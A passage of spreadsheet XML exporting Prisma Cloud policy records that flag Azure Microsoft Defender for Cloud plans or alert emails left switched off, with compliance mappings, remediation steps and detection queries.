v8.1, ISO/IEC 27002:2013, CIS v2.1.0 (Azure) Level 2, MTSBv2_Azure, Secure Controls Framework (SCF) - 2022.2.1, Sarbanes Oxley Act (SOX), NIST SP 800-171 Revision 2, CIS Controls v7.1, NIST SP 800-172, CSA CCM v.4.0.1, MLPS 2.0 (Level 2), CSA CCM v.4.0.1, ISO/IEC 27018:2019, Secure Controls Framework (SCF) - 2024.2</t>
        </is>
      </c>
      <c r="B2396" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2396" s="2" t="inlineStr"/>
      <c r="D2396" t="inlineStr"/>
      <c r="E2396" t="inlineStr"/>
      <c r="F2396" t="inlineStr"/>
      <c r="G2396" t="b">
        <v>1</v>
      </c>
      <c r="H23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6" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2396" t="inlineStr">
        <is>
          <t>azure-security-center</t>
        </is>
      </c>
      <c r="K2396" t="inlineStr">
        <is>
          <t>Azure Microsoft Defender for Cloud is set to Off for App Service</t>
        </is>
      </c>
      <c r="L2396" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2396" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2396" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2396" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2396" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2396" t="inlineStr">
        <is>
          <t>Security Center</t>
        </is>
      </c>
      <c r="R2396" t="inlineStr">
        <is>
          <t>2.2</t>
        </is>
      </c>
      <c r="S2396" t="inlineStr"/>
      <c r="T2396" t="b">
        <v>0</v>
      </c>
      <c r="U2396" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2396" t="inlineStr">
        <is>
          <t>azure-security-center-settings</t>
        </is>
      </c>
      <c r="W2396" t="inlineStr">
        <is>
          <t>This policy identifies Azure Microsoft Defender for Cloud (previously known as Azure Security Center and Azure Defender) which has defender setting for App Service is set to Off. Enabling Microsoft Defender for Cloud provides the tools needed to harden your resources, track your security posture, protect against cyberattacks, and streamline security management. It is highly recommended to enable Microsoft Defender for App Service.</t>
        </is>
      </c>
      <c r="X2396"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'App Service' Select 'On' under Plan.
8. Select 'Save' 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/ensure-that-azure-defender-is-set-to-on-for-app-service
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/ensure-that-azure-defender-is-set-to-on-for-app-service</t>
        </is>
      </c>
      <c r="Y2396" t="inlineStr"/>
      <c r="Z2396" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-security-center-settings' AND json.rule = pricings[?any( name equals AppServices and properties.pricingTier does not equal Standard)] exists
{"category":"General","resourceTypes":["azurerm_security_center_subscription_pricing"]}</t>
        </is>
      </c>
      <c r="AA2396" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2396" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2396" t="inlineStr">
        <is>
          <t>PC-AZR-SC-639-CKV_AZURE_61</t>
        </is>
      </c>
      <c r="AD2396" t="b">
        <v>1</v>
      </c>
      <c r="AE2396" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2396" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG23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6" t="inlineStr">
        <is>
          <t>8953512c-4b2f-4622-a3c8-fff004bfec66</t>
        </is>
      </c>
      <c r="AI2396" t="inlineStr">
        <is>
          <t>11e46b7a-6a7d-4500-aef5-f21b0ee608ad</t>
        </is>
      </c>
      <c r="AJ2396" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2396" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2397">
      <c r="A2397" t="inlineStr">
        <is>
          <t>ISO/IEC 27017:2015, kfirdaus AWS Account-CS, NIST SP 800-172, ISO/IEC 27017:2015, CIS v2.0.0 (Azure) Level 2, CSA CCM v.4.0.1, CIS v1.2.0 (Azure), CIS v1.4.0 (Azure), MTSBv2_Azure, ISO/IEC 27017:2015, RBI Baseline Cyber Security and Resilience Requirements, ISO/IEC 27017:2015, Copy of CIS Controls v8, Azure Security Benchmark (v3), CIS v1.3.1 (Azure), MLPS 2.0 (Level 2), Secure Controls Framework (SCF) - 2024.2, CIS Controls v8, NIST CSF, Azure Security Benchmark (v2), CIS v2.1.0 (Azure) Level 2, Copy of Azure Security Benchmark (v3), Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27017:2015, MLPS 2.0 (Level 2), CSA CCM v.4.0.1, NIST SP 800-171 Revision 3, Secure Controls Framework (SCF) - 2022.2.1, CSA CCM v.4.0.1, Insurance Regulatory And Development Authority Of India, ISO/IEC 27002:2013, PCI DSS v3.2.1, ISO/IEC 27002:2013, ISO/IEC 27017:2015, Copy of Azure Security Benchmark (v3), CSA CCM v.4.0.1, kashan ACSC Information Security Manual (ISM), ISO/IEC 27002:2013, Azure Security Benchmark (v3), CSA CCM v.4.0.1, ISO/IEC 27002:2013, Copy of CIS v1.2.0 (Azure), ACSC Information Security Manual (ISM), HITRUST v.9.4.2 [Deprecated], Copy of ACSC Information Security Manual (ISM)-clone, CIS v1.3.0 (Azure), CIS v1.5.0 (Azure) - Level 2, CIS Controls v8.1, ISO/IEC 27002:2013, Secure Controls Framework (SCF) - 2022.2.1, Sarbanes Oxley Act (SOX), NIST SP 800-171 Revision 2, CIS Controls v7.1, NIST SP 800-172, CSA CCM v.4.0.1, MLPS 2.0 (Level 2), CSA CCM v.4.0.1, ISO/IEC 27018:2019, Secure Controls Framework (SCF) - 2024.2</t>
        </is>
      </c>
      <c r="B2397" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2397" s="2" t="inlineStr"/>
      <c r="D2397" t="inlineStr"/>
      <c r="E2397" t="inlineStr"/>
      <c r="F2397" t="inlineStr"/>
      <c r="G2397" t="b">
        <v>1</v>
      </c>
      <c r="H23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7" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2397" t="inlineStr">
        <is>
          <t>azure-security-center</t>
        </is>
      </c>
      <c r="K2397" t="inlineStr">
        <is>
          <t>Azure Microsoft Defender for Cloud is set to Off for Storage</t>
        </is>
      </c>
      <c r="L2397" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2397" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2397" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2397" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2397" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2397" t="inlineStr">
        <is>
          <t>Guidelines for Outsourcing</t>
        </is>
      </c>
      <c r="R2397" t="inlineStr">
        <is>
          <t>ISM-1570</t>
        </is>
      </c>
      <c r="S2397" t="inlineStr"/>
      <c r="T2397" t="b">
        <v>0</v>
      </c>
      <c r="U2397" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2397" t="inlineStr">
        <is>
          <t>azure-security-center-settings</t>
        </is>
      </c>
      <c r="W2397" t="inlineStr">
        <is>
          <t>This policy identifies Azure Microsoft Defender for Cloud (previously known as Azure Security Center and Azure Defender) which has defender setting for Storage is set to Off. Enabling Microsoft Defender for Cloud provides the tools needed to harden your resources, track your security posture, protect against cyberattacks, and streamline security management. It is highly recommended to enable Microsoft Defender for Storage.</t>
        </is>
      </c>
      <c r="X2397"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'Storage' Select 'On' under Plan.
8. Select 'Save' 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/ensure-that-azure-defender-is-set-to-on-for-storage
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/ensure-that-azure-defender-is-set-to-on-for-storage</t>
        </is>
      </c>
      <c r="Y2397" t="inlineStr"/>
      <c r="Z2397" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-security-center-settings' AND json.rule = pricings[?any( name equals StorageAccounts and properties.pricingTier does not equal Standard)] exists
{"category":"General","resourceTypes":["azurerm_security_center_subscription_pricing"]}</t>
        </is>
      </c>
      <c r="AA2397" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2397" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2397" t="inlineStr">
        <is>
          <t>PC-AZR-SC-642-CKV_AZURE_84</t>
        </is>
      </c>
      <c r="AD2397" t="b">
        <v>1</v>
      </c>
      <c r="AE2397" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2397" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG23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7" t="inlineStr">
        <is>
          <t>5436f3cc-3815-44f4-ac09-b8418e1f8e1d</t>
        </is>
      </c>
      <c r="AI2397" t="inlineStr">
        <is>
          <t>c81c7c29-7d43-4e01-b830-8ba088f34a29</t>
        </is>
      </c>
      <c r="AJ2397" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2397" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2398">
      <c r="A2398" t="inlineStr"/>
      <c r="B2398" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2398" s="2" t="inlineStr"/>
      <c r="D2398" t="inlineStr"/>
      <c r="E2398" t="inlineStr"/>
      <c r="F2398" t="inlineStr"/>
      <c r="G2398" t="b">
        <v>1</v>
      </c>
      <c r="H23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398" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2398" t="inlineStr">
        <is>
          <t>azure-security-center</t>
        </is>
      </c>
      <c r="K2398" t="inlineStr">
        <is>
          <t>Azure Microsoft Defender for Cloud set to Off for Agentless container vulnerability assessment</t>
        </is>
      </c>
      <c r="L2398" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2398" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2398" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2398" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2398" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2398" t="inlineStr"/>
      <c r="R2398" t="inlineStr"/>
      <c r="S2398" t="inlineStr"/>
      <c r="T2398" t="b">
        <v>0</v>
      </c>
      <c r="U2398" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2398" t="inlineStr">
        <is>
          <t>azure-security-center-settings</t>
        </is>
      </c>
      <c r="W2398" t="inlineStr">
        <is>
          <t>This policy identifies Azure Microsoft Defender for Cloud where the Agentless container vulnerability assessment is set to Off.
Agentless container vulnerability assessment enables automatic scanning for vulnerabilities in container images stored in Azure Container Registry or running in Azure Kubernetes Service without additional agents. Disabling it exposes container images to unpatched security issues and misconfigurations, risking exploitation and data breaches. Enabling agentless container vulnerability assessment ensures continuous scanning for known vulnerabilities, enhancing security by proactively identifying risks and providing remediation suggestions to maintain compliance with industry standards.
As a security best practice, it is recommended to enable Agentless container vulnerability assessment in Azure Microsoft Defender for Cloud.</t>
        </is>
      </c>
      <c r="X2398" t="inlineStr">
        <is>
          <t>1. Log in to the Azure portal
2. Navigate to 'Microsoft Defender for Cloud'
3. Under 'Management', select 'Environment Settings'
4. Click on the subscription name
5. Select the 'Defender plans'
6. Click on 'Settings &amp; monitoring' at the top
7. In the table, find 'Agentless container vulnerability assessment' and select 'On' under Plan
8. Click 'Continue' in the top left
9. Click 'Save'</t>
        </is>
      </c>
      <c r="Y2398" t="inlineStr"/>
      <c r="Z2398" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-security-center-settings' AND json.rule = not (pricings[?any(properties.extensions[?any(name equal ignore case ContainerRegistriesVulnerabilityAssessments AND isEnabled is true)] exists AND properties.pricingTier equal ignore case Standard )] exists)</t>
        </is>
      </c>
      <c r="AA2398" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2398" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2398" t="inlineStr">
        <is>
          <t>PC-AZR-SC-1315</t>
        </is>
      </c>
      <c r="AD2398" t="b">
        <v>1</v>
      </c>
      <c r="AE2398" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2398" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG23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398" t="inlineStr">
        <is>
          <t>b2bfe690-cfe1-408a-95dd-24330dbe9311</t>
        </is>
      </c>
      <c r="AI2398" t="inlineStr">
        <is>
          <t>3caab1bb-4547-45ca-914c-6a82a42ddd64</t>
        </is>
      </c>
      <c r="AJ2398" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2398" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2399">
      <c r="A2399" t="inlineStr">
        <is>
          <t>ISO 27001:2013, Brazilian Data Protection Law (LGPD), NIST SP 800-171 Revision 2, CIS v1.5.0 (Azure) - Level 1, APRA (CPS 234) Information Security, CIS v1.2.0 (Azure), NIST CSF v2.0, NIST SP 800-172, CIS v1.1 (Azure), ITSG-33, NIST CSF, NIST 800-53 Rev4, NIST 800-53 Rev 5, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), GDPR, HITRUST CSF v9.3 [Deprecated], CIS v1.3.1 (Azure), TX-RAMP Level 2, NIST CSF, CSA CCM v3.0.1, APRA (CPS 234) Information Security, SOC 2, GDPR, Azure Security Benchmark (v2), NIST CSF, CIS v2.1.0 (Azure) Level 1, PCI DSS v3.2.1, CyberSecurity Law of the People's Republic of China, HITRUST CSF v9.3 [Deprecated], NIST 800-53 Rev4, NIST CSF, ISO/IEC 27001:2022, APRA (CPS 234) Information Security, CIS v1.4.0 (Azure), RBI Baseline Cyber Security and Resilience Requirements, ISO 27001:2013, SOC 2, CSA CCM v3.0.1, SOC 2, NIST CSF, MLPS 2.0 (Level 2), NIST CSF, HITRUST CSF v9.3 [Deprecated], NIST CSF, Secure Controls Framework (SCF) - 2024.2, NIST 800-53 Rev 5, CIS Controls v8, HITRUST CSF v9.3 [Deprecated], TX-RAMP Level 1, NIST 800-53 Rev4, NIST CSF v2.0, CIS v2.0.0 (Azure) Level 1, SOC 2, CSA CCM v3.0.1, ISO 27001:2013, Secure Controls Framework (SCF) - 2024.2, TX-RAMP Level 2, MLPS 2.0 (Level 2), CSA CCM v3.0.1, ISO 27001:2013, Secure Controls Framework (SCF) - 2024.2, NIST CSF, Secure Controls Framework (SCF) - 2022.2.1, HITRUST CSF v9.3 [Deprecated], NIST CSF, NIST CSF, NIST SP 800-171 Revision 3, CIS v2.0.0 (Azure) Level 1, NIST 800-53 Rev 5, CRI Profile v2.0, NIST CSF, CyberSecurity Law of the People's Republic of China, CSA CCM v3.0.1, NIST 800-53 Rev4, NIST CSF, HIPAA, NIST 800-53 Rev4, NIST 800-53 Rev4, Insurance Regulatory And Development Authority Of India, SOC 2, NIST CSF, APRA (CPS 234) Information Security, CSA CCM v3.0.1, SOC 2, ACSC Information Security Manual (ISM), NIST CSF v2.0, Azure Security Benchmark (v3), APRA (CPS 234) Information Security, CIS v2.1.0 (Azure) Level 1, NIST SP 800-171 Revision 2, CSA CCM v3.0.1, GDPR, NIST CSF, NIST CSF, SOC 2, NIST CSF, HITRUST CSF v9.3 [Deprecated], NIST SP 800-171 Revision 3, HITRUST CSF v.11.2.0, NIST CSF, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), ISO/IEC 27001:2022, MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, CIS Controls v8.1, TX-RAMP Level 2, CSA CCM v3.0.1, Cybersecurity Maturity Model Certification (CMMC) v.1.02, CSA CCM v3.0.1, Secure Controls Framework (SCF) - 2022.2.1, CIS v1.3.0 (Azure), NIST 800-53 Rev 5, Sarbanes Oxley Act (SOX), NIST CSF, CIS Controls v7.1, NIST CSF, NIST 800-53 Rev 5, Fedramp (Moderate), NIST SP 800-172, SOC 2, CSA CCM v3.0.1, MLPS 2.0 (Level 2), NIST CSF v2.0, HITRUST CSF v9.3 [Deprecated], HITRUST CSF v9.3 [Deprecated], ITSG-33, NIST 800-53 Rev 5, NIST 800-53 Rev4, Fedramp (Moderate), TX-RAMP Level 1</t>
        </is>
      </c>
      <c r="B2399" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2399" s="2" t="inlineStr"/>
      <c r="D2399" t="inlineStr"/>
      <c r="E2399" t="inlineStr"/>
      <c r="F2399" t="inlineStr"/>
      <c r="G2399" t="b">
        <v>1</v>
      </c>
      <c r="H23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399" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2399" t="inlineStr">
        <is>
          <t>azure-security-center</t>
        </is>
      </c>
      <c r="K2399" t="inlineStr">
        <is>
          <t>Azure Microsoft Defender for Cloud security alert email notifications is not set</t>
        </is>
      </c>
      <c r="L2399" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2399" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2399" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2399" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2399" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2399" t="inlineStr">
        <is>
          <t>AU</t>
        </is>
      </c>
      <c r="R2399" t="inlineStr">
        <is>
          <t>AU-06-00 : Audit Record Review, Analysis, and Reporting</t>
        </is>
      </c>
      <c r="S2399" t="inlineStr">
        <is>
          <t>Policy Status Review,Security_Center</t>
        </is>
      </c>
      <c r="T2399" t="b">
        <v>0</v>
      </c>
      <c r="U2399" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2399" t="inlineStr">
        <is>
          <t>azure-security-center-settings</t>
        </is>
      </c>
      <c r="W2399" t="inlineStr">
        <is>
          <t>This policy identifies the Azure Microsoft Defender for Cloud (previously known as Azure Security Center and Azure Defender) which have not set security alert email notifications. Enabling security alert emails ensures that security alert emails are received from Microsoft. This ensures that the right people are aware of any potential security issues and are able to mitigate the risk.</t>
        </is>
      </c>
      <c r="X2399" t="inlineStr">
        <is>
          <t>1. Log in to the Azure portal
2. Go to 'Microsoft Defender for Cloud'
3. Select 'Environment Settings'
4. Click on the subscription name
5. Click on 'Email notifications'
6. Under 'Notification types', check the check box next to Notify about alerts with the following severity (or higher): and select High from the drop down menu
7. Select 'Save' 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/ensure-that-security-contact-emails-is-set
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/ensure-that-security-contact-emails-is-set</t>
        </is>
      </c>
      <c r="Y2399" t="inlineStr"/>
      <c r="Z2399" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-security-center-settings' AND json.rule = (securityContacts is empty or securityContacts[?any(properties.email is empty and alertNotifications equal ignore case Off)] exists) and pricings[?any(properties.pricingTier equal ignore case Standard)] exists
{"category":"General","resourceTypes":["azurerm_security_center_contact"]}</t>
        </is>
      </c>
      <c r="AA2399" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2399" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2399" t="inlineStr">
        <is>
          <t>PC-AZR-SC-125-CKV_AZURE_131</t>
        </is>
      </c>
      <c r="AD2399" t="b">
        <v>1</v>
      </c>
      <c r="AE2399" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2399" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG23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399" t="inlineStr">
        <is>
          <t>8d78bf42-4e80-4e25-89fa-5f8a7fe8ddb1</t>
        </is>
      </c>
      <c r="AI2399" t="inlineStr">
        <is>
          <t>084973b5-bb39-456c-bfef-6ec42c261c59</t>
        </is>
      </c>
      <c r="AJ2399" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2399" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2400">
      <c r="A2400" t="inlineStr">
        <is>
          <t>CIS v1.4.0 (Azure), kfirdaus AWS Account-CS, CIS v2.0.0 (Azure) Level 2, CIS v2.0.0 (Azure) Level 2, RBI Baseline Cyber Security and Resilience Requirements, Copy of CIS Controls v8, Azure Security Benchmark (v3), MLPS 2.0 (Level 2), Secure Controls Framework (SCF) - 2024.2, CIS Controls v8, Copy of Azure Security Benchmark (v3), Secure Controls Framework (SCF) - 2024.2, MLPS 2.0 (Level 2), Secure Controls Framework (SCF) - 2022.2.1, Insurance Regulatory And Development Authority Of India, Copy of Azure Security Benchmark (v3), kashan ACSC Information Security Manual (ISM), CIS v1.5.0 (Azure) - Level 2, Azure Security Benchmark (v3), CIS v1.3.1 (Azure), ACSC Information Security Manual (ISM), Copy of ACSC Information Security Manual (ISM)-clone, CIS v2.1.0 (Azure) Level 2, CIS Controls v8.1, MTSBv2_Azure, Secure Controls Framework (SCF) - 2022.2.1, Azure Security Benchmark (v2), Sarbanes Oxley Act (SOX), CIS Controls v7.1, MLPS 2.0 (Level 2), CIS v1.3.0 (Azure), Secure Controls Framework (SCF) - 2024.2</t>
        </is>
      </c>
      <c r="B2400" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2400" s="2" t="inlineStr"/>
      <c r="D2400" t="inlineStr"/>
      <c r="E2400" t="inlineStr"/>
      <c r="F2400" t="inlineStr"/>
      <c r="G2400" t="b">
        <v>1</v>
      </c>
      <c r="H24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0" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2400" t="inlineStr">
        <is>
          <t>azure-security-center</t>
        </is>
      </c>
      <c r="K2400" t="inlineStr">
        <is>
          <t>Azure Microsoft Defender for Cloud is set to Off for SQL servers on machines</t>
        </is>
      </c>
      <c r="L2400" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2400" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2400" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2400" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2400" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2400" t="inlineStr">
        <is>
          <t>Security Center</t>
        </is>
      </c>
      <c r="R2400" t="inlineStr">
        <is>
          <t>2.4</t>
        </is>
      </c>
      <c r="S2400" t="inlineStr"/>
      <c r="T2400" t="b">
        <v>0</v>
      </c>
      <c r="U2400" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2400" t="inlineStr">
        <is>
          <t>azure-security-center-settings</t>
        </is>
      </c>
      <c r="W2400" t="inlineStr">
        <is>
          <t>This policy identifies Azure Microsoft Defender for Cloud (previously known as Azure Security Center and Azure Defender) which has defender setting for SQL servers on machines is set to Off. Enabling Microsoft Defender for Cloud provides the tools needed to harden your resources, track your security posture, protect against cyberattacks, and streamline security management. It is highly recommended to enable Microsoft Defender for SQL servers on machines.</t>
        </is>
      </c>
      <c r="X2400"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'SQL servers on machines' Select 'On' under Plan.
8. Select 'Save' 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/ensure-that-azure-defender-is-set-to-on-for-sql-servers-on-machines
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/azure-policies/azure-general-policies/ensure-that-azure-defender-is-set-to-on-for-sql-servers-on-machines</t>
        </is>
      </c>
      <c r="Y2400" t="inlineStr"/>
      <c r="Z2400" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-security-center-settings' AND json.rule = pricings[?any( name equals SqlServerVirtualMachines and properties.pricingTier does not equal Standard)] exists
{"category":"General","resourceTypes":["azurerm_security_center_subscription_pricing"]}</t>
        </is>
      </c>
      <c r="AA2400" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2400" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2400" t="inlineStr">
        <is>
          <t>PC-AZR-SC-705-CKV_AZURE_79</t>
        </is>
      </c>
      <c r="AD2400" t="b">
        <v>1</v>
      </c>
      <c r="AE2400" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2400" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG24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0" t="inlineStr">
        <is>
          <t>1f3ae628-17bf-4d0b-b2d1-a0fbb61bf19c</t>
        </is>
      </c>
      <c r="AI2400" t="inlineStr">
        <is>
          <t>d0d41a3f-5c0d-4d6e-8559-2d44298a36ed</t>
        </is>
      </c>
      <c r="AJ2400" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2400" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="2401">
      <c r="A2401" t="inlineStr"/>
      <c r="B2401" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2401" s="2" t="inlineStr"/>
      <c r="D2401" t="inlineStr"/>
      <c r="E2401" t="inlineStr"/>
      <c r="F2401" t="inlineStr"/>
      <c r="G2401" t="b">
        <v>1</v>
      </c>
      <c r="H24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01" t="inlineStr">
        <is>
          <t>azure</t>
        </is>
      </c>
      <c r="J2401" t="inlineStr">
        <is>
          <t>azure-security-center</t>
        </is>
      </c>
      <c r="K2401" t="inlineStr">
        <is>
          <t>Azure Microsoft Defender for Cloud set to Off for Agentless scanning for machines</t>
        </is>
      </c>
      <c r="L2401" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2401" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2401" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2401" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2401" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2401" t="inlineStr"/>
      <c r="R2401" t="inlineStr"/>
      <c r="S2401" t="inlineStr"/>
      <c r="T2401" t="b">
        <v>0</v>
      </c>
      <c r="U2401" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2401" t="inlineStr">
        <is>
          <t>azure-security-center-settings</t>
        </is>
      </c>
      <c r="W2401" t="inlineStr">
        <is>
          <t>This policy identifies Azure Microsoft Defender for Cloud where the Agentless scanning for machines is set to Off.
Agentless scanning uses disk snapshots to detect installed software, vulnerabilities, and plain text secrets without needing agents on each machine. When disabled, your environment risks exposure to software vulnerabilities and unauthorized software, diminishing visibility into security issues. Enabling Agentless scanning improves security by identifying vulnerabilities and sensitive data with minimal performance impact, streamlining management and ensuring strong threat detection and compliance.
As a security best practice, it is recommended to enable Agentless scanning for machines in Azure Microsoft Defender for Cloud.</t>
        </is>
      </c>
      <c r="X2401" t="inlineStr">
        <is>
          <t>1. Log in to the Azure portal
2. Navigate to 'Microsoft Defender for Cloud'
3. Under 'Management', select 'Environment Settings'
4. Click on the subscription name
5. Select the 'Defender plans'
6. Click on 'Settings &amp; monitoring' at the top
7. In the table, find 'Agentless scanning for machines' and select 'On' under Plan
8. Click 'Continue' in the top left
9. Click 'Save'</t>
        </is>
      </c>
      <c r="Y2401" t="inlineStr"/>
      <c r="Z2401" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'azure' AND api.name = 'azure-security-center-settings' AND json.rule = not (pricings[?any(properties.extensions[?any(name equal ignore case AgentlessVmScanning AND isEnabled is true)] exists AND properties.pricingTier equal ignore case Standard )] exists)</t>
        </is>
      </c>
      <c r="AA2401" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2401" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2401" t="inlineStr">
        <is>
          <t>PC-AZR-SC-1313</t>
        </is>
      </c>
      <c r="AD2401" t="b">
        <v>1</v>
      </c>
      <c r="AE2401" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
